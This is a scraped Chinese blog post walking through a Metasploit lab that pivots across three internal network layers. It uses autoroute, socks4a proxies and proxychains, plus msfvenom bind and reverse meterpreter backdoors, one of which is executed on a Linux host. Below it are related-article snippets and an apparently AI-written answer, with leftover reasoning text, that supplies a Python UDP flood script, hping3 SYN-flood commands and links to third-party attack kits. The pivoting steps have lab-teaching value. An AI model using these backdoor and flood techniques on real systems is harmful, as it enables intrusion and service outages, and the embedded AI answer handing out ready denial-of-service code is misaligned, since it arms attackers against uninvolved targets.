MSF三层网络渗透

最新推荐文章于 2024-11-20 08:57:09 发布
最新推荐文章于 2024-11-20 08:57:09 发布
阅读量968 收藏 8
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 后渗透 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44842234/article/details/125525867

 网络拓扑图如下

假设已经拿到了跳板机B的权限
其中A、B、C为windows D为linux服务器

ipconfig发现存在两张网卡
192.168.31.60
192.168.3.31

 

在kali(A主机)meterpreter 中添加去往 192.168.3.0网段的路由并且启动socks4a代理 

meterpreter > run autoroute -s 192.168.3.0/24                      #添加路由
meterpreter > run autoroute -p                                     #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a         #使用socks4a协议并运行

注:socks4a在msf中默认远端端口为1080端口,故在/etc/proxychains.conf 也要设置为1080端口

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 1080


成功访问第二层网络

 

msf配合Proxifier实现内网穿透
在本机连接kali的1080端口(socks4a)

本机通过Proxifier成功访问第二层网络(C主机)

制作后门穿透第三层网络(正向连接)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4321 -f exe -o 4321.exe
注:C主机监听4321端口,B主机主动连接C主机。

 

 

use exploit/multi/handler
连接C主机的ip 192.168.3.3

 

成功得到会话

ipconfig发现存在两张网卡
192.168.3.3
10.10.10.1

添加去往 192.168.3.0网段的路由并且启动socks4a代理
meterpreter > run autoroute -s 10.10.10.0/24                      #添加路由
meterpreter > run autoroute -p                                    #查看路由
msf6 exploit(multi/handler) > use auxiliary/server/socks4a        #使用socks4a协议并运行

 

设置socks4a端口为9999

 

vi /etc/proxychains.conf 
添加 socks4  192.168.31.31 9999

 proxychains curl http://10.10.10.2/ip.txt
可以看到代理经过了192.168.31.31:1080->192.168.31.31:9999成功访问第三层网络的主机 10.10.10.2

 本机访问也可以访问到第三层网络

 

 

生成一个反向后门(因为D主机为linux,故生成一个elf格式的后门)
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost 10.10.10.1 lport=1234 -f elf -o 123.elf

 

监听 linux/x86/meterpreter/reverse_tcp

 

 在D主机上执行后门
 chmod +x 123.elf
./123.elf

 10.0.0.2(D主机)成功上线

 

 

一个实验了解多内网渗透
Jeeseen123的博客
11-03 1703
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多内网进行的渗透。 一、实验简介 网络拓扑图 渗透机:win10+kali 第一靶机 (外网web服务器): Linux 第二场靶机 (内网web服务器): Linux 第三层靶机 (内网办公机) : win7 用三层
CFS三层靶机——内网渗透流程
2301_81177363的博客
05-05 1060
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
CFS三层渗透
weixin_54855337的博客
03-13 314
添加蚁剑,这样流量就能到达22段了,这里发现使用msf模块的代理,然后主机使用代理软件,会存在问题,因为虚拟机的网络就是靠主机的虚拟网卡去提供的网络,所以无意义,也是测试的时候出现了问题,第一次的时候使用frp可以成功连接,为了实现的进行直接把shell文件上传到靶机。msf的代理不稳定,可以使用其他工具,比如frp等等,然后配置proxychines,利用proxychines打开msf,在msf里面手动添加路由,也是可以进行利用的。【靶机的详情都写了宝塔的访问地址以及管理员账户密码,默认IP】
利用MSF实现三层网络的一次内网渗透
weixin_34357962的博客
06-19 610
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为 image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: ...
内网穿透
weixin_46686336的博客
11-10 391
内网渗透
简单模拟三层内网渗透
Globalizationa的博客
02-05 832
0X01 设置三张独立网卡简单的网路拓扑图0X02 按照上面的网络拓扑图设置IP0X03 实验背景:已经拿下Ubuntu的webshell的情况下进行进入会话,查看网络环境,发现还有个网段地址 192.168.220.0/240X04 第二网络探索利用第一的meterpreter添加第二的路由:然后利用msf进行第二网络存活主机扫描:切换到扫描模块 use auxiliary/scanner/discovery/arp_sweep 进行各项配置之后,查询之后发现只有192.16...
三层网络靶场搭建&MSF内网渗透
2301_77147728的博客
03-23 492
在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多网络的练习环境。本文通过VMware搭建3网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1201
cfs三层靶机渗透详细过程
CSF三层主机:渗透测试靶场笔记
Zeker62的博客
03-27 5988
测试的时候会出现各种错误,存在重新搭建环境的情况,如有IP对不上号,请尽量忽略。
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。
随心所欲不逾矩
02-27 983
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
三层网络渗透测试实验
m0_60571990的博客
11-23 329
三层网络渗透测试实验
隧道技术 Frp 多内网穿透
Love&Share
12-21 5137
文章目录Frp穿透Frp多内网实战实验环境操作第一隧道第二隧道 Frp穿透 项目地址:https://github.com/fatedier/frp 中文文档:https://gofrp.org/docs/ frp 是一个可用于内网穿透的高性能的全平台反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网 frp 采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖 F.
综合渗透|超详细!手把手学习三层网络渗透及综合渗透概念
aizhou1的博客
11-20 2136
本次我们以三层网络渗透(三设备),在本地复现其渗透测试及内网渗透的知识点,下方会给出下载地址和学习视频(4视频共130分钟左右),从安装到到渗透完毕,其中会给出知识点和作用,视频期间会在其中说明一些避坑以此涨经验,下方为本次拓扑(互联网IP为视频中讲解虚拟IP,不存在任何针对性)我们本次会穿插网鼎杯往年综合渗透知识在视频中讲解,由于是本地复现,无法复现全部拓扑(如域渗透,蜜罐等),但已尽力去复现在综合渗透测试中的知识点(其中视频会提到很多考点)
FRP多级内网穿透实验(虚拟机多级网络环境搭建+FRP工具使用
AFCC_的博客(Web_Dog)
05-13 2053
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
内网穿透之多代理
weixin_43047908的博客
10-10 3020
目录前言环境搭建ewfrp 前言 平时看大部分文章都是讲的两网络的穿透,在真实场景下,有时候是三层甚至四,自己实践之后发现还是和两网络差距比较大的。由于是三层网络,写起来图会比较多,选取了四款常用穿透软件:ew,nps,frp进行试验。 环境搭建 拓扑图如下: 192.168.1.0/24模拟公网环境。 每台PC上都有一个web服务,内网主机除边缘win7外全部不出网,内网同网段之间的主机可以相互访问,不同网段相互隔离。 假设现在已经拿到边缘主机win7。(文中所指的win2012全部指相对左边这台
红队——多内网环境渗透测试
m0_65355570的博客
12-06 998
本次多网络渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含GPP漏洞利用,非约束委派和约束委派,CVE-2020-1472,SQLServer提权等等文中若有不当之处,还望各位大佬多多点评。请注意:整个环境共四台目标机,分别处在三层内网环境当中DMZ区的靶机拥有两个网卡,一个用来对外提供服务,一个用来连通第二次网络第二网络的靶机同样有两个网卡,一个连通第二网络,一个连通第三层网络三层网络的靶机只有一张网卡,连通第三层网络,包含域控机
使用frp隧道穿透多内网
qq_18811919的博客
12-22 1084
在内网中使用frp隧道穿透多内网
[内网渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 1545
MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
MSF中没有dos模块怎么办
最新发布
06-25
<think>我们正在讨论如何在MetasploitFramework(MSF)中缺少DOS模块时进行处理。根据之前的对话和引用内容,我们可以总结以下几点:1.用户提到“没有dos模块怎么下”,我们之前已经给出了一些解决方案,包括验证现有模块、重新安装MSF、手动添加模块等。2.引用[1]提供了一些额外的攻击模块资源,例如Elevatekit和Aggressor,这些可能包含DOS模块或其他攻击模块,但需要注意这些是第三方资源,使用需谨慎。3.引用[3]提到了一个Python程序实现UDP的DOS渗透测试,这提示我们如果MSF中没有所需的DOS模块,也可以考虑使用其他工具或自己编写脚本。4.引用[4]列举了一些MSF中的扫描模块,说明MSF模块的丰富性,但DOS模块可能不在其中。因此,针对用户当前的问题“MSF中缺少DOS模块怎么处理”,我们可以结合之前的回答和引用内容,给出如下解决方案:###一、检查并更新MSF(首选方法)1.**更新MSF**:确保使用最新版本,因为新版本可能增加了模块。```bashmsfupdate#更新Metasploit```2.**搜索模块**:使用`search`命令再次搜索,可能模块名称不完全匹配。```bashmsf6>searchtype:auxiliarydos```###二、手动添加DOS模块如果更新后仍然缺少,可以手动添加模块:1.**从官方GitHub获取**:-访问MSF官方模块库:[https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/dos](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/dos)-下载需要的.rb文件(例如`http/slowloris.rb`)。2.**保存到本地目录**:-用户目录(推荐,避免系统更新覆盖):```bashmkdir-p~/.msf4/modules/auxiliary/doscpslowloris.rb~/.msf4/modules/auxiliary/dos/```-系统目录(需要管理员权限):```bashsudocpslowloris.rb/usr/share/metasploit-framework/modules/auxiliary/dos/```3.**重新加载MSF**:```bashmsf6>reload_all#重新加载所有模块```###三、使用第三方资源(谨慎使用)引用[1]中提到的资源(如Elevatekit和Aggressor)可能提供额外的DOS模块:1.**Elevatekit**:-GitHub地址:https://github.com/rsmudge/Elevatekit-按照其文档安装,可能包含一些DOS模块。2.**Aggressor**:-GitHub地址:https://github.com/k8gege/Aggressor-同样,按照文档安装。注意:第三方模块可能存在安全风险,使用前需审查代码。###四、替代方案:使用其他工具如果MSF中确实没有合适的DOS模块,可以考虑其他工具:1.**hping3**:进行SYN洪水攻击```bashhping3-S--flood-p80192.168.1.100```2.**slowhttptest**:进行慢速HTTP攻击(Slowloris等)```bashslowhttptest-c1000-H-g-oslowhttp-i10-r200-tGET-uhttp://target-x24-p3```3.**Python脚本**:如引用[3]中提到的smurf.py(UDP洪水攻击),可以自行编写或下载现成脚本。###五、注意事项-**合法性**:进行DOS测试必须获得明确授权[^4]。-**影响**:DOS攻击可能导致目标服务不可用,测试应在隔离环境中进行。-**防御**:在测试后,应协助部署防御措施,如配置防火墙、启用SYNCookie等。---§§相关问题§§1.如何验证Metasploit安装是否完整?2.有哪些替代工具可以实现DOS攻击测试?3.企业网络如何有效防御DOS攻击?4.Metasploit模块开发的基本流程是什么?[^1]:https://github.com/rsmudge/Elevatekit,https://k8gege.org/Download/,https://github.com/k8gege/Aggressor[^3]:通过UDP对靶机服务器场景进行DOS渗透测试的Python程序[^4]:合法性要求</think>### Metasploit缺少DOS模块解决方案 当MSF中缺少DOS模块时,可通过以下方法解决: --- #### 一、手动添加DOS模块(推荐) 1. **获取模块源文件** - 访问官方模块库:[Rapid7 Metasploit GitHub](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/dos) - 或第三方资源库(谨慎使用): - [k8gege/Aggressor](https://github.com/k8gege/Aggressor) [^1] - [rsmudge/Elevatekit](https://github.com/rsmudge/Elevatekit) [^1] 2. **安装模块** ```bash # 下载模块文件(示例:slowloris.rb) wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/slowloris.rb # 复制到MSF模块目录 mkdir -p ~/.msf4/modules/auxiliary/dos cp slowloris.rb ~/.msf4/modules/auxiliary/dos/ ``` 3. **重新加载模块** ```bash msf6 > reload_all # 在MSF控制台执行 ``` --- #### 二、使用替代工具(当MSF不可用时) | 工具名称 | 攻击类型 | 安装命令/下载地址 | |---------------|---------------|--------------------------------------| | hping3 | SYN洪水 | `sudo apt install hping3` | | slowhttptest | HTTP慢速攻击 | `sudo apt install slowhttptest` | | LOIC | 多协议攻击 | [GitHub](https://github.com/NewEraCracker/LOIC) | | Python脚本 | 自定义攻击 | 引用[3]示例:UDP DOS脚本 (`smurf.py`) | Python示例(UDP洪水攻击): ```python # smurf.py 核心代码 import socket target_ip = "192.168.1.100" # F2替换为目标IP sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while True: sock.sendto(b"X"*1024, (target_ip, 80)) # 发送垃圾数据 ``` --- #### 三、验证与调试模块 1. **检查模块加载** ```bash msf6 > search type:auxiliary dos ``` 应显示新增模块如: ``` auxiliary/dos/http/slowloris HTTP慢速攻击 ``` 2. **模块使用示例** ```bash use auxiliary/dos/http/slowloris set RHOST 192.168.1.100 set RPORT 80 set THREADS 50 run ``` --- #### 四、注意事项 1. **权限问题** - Linux需`sudo`执行网络操作 - Windows需管理员权限运行MSF 2. **模块兼容性** - 确保Ruby版本匹配(MSF 6需Ruby 2.7+) - 冲突模块处理: ```bash rm ~/.msf4/module_cache/* # 清除缓存 ``` 3. **法律合规性** > **必须获得书面授权**,未经授权的DOS测试涉嫌违法[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值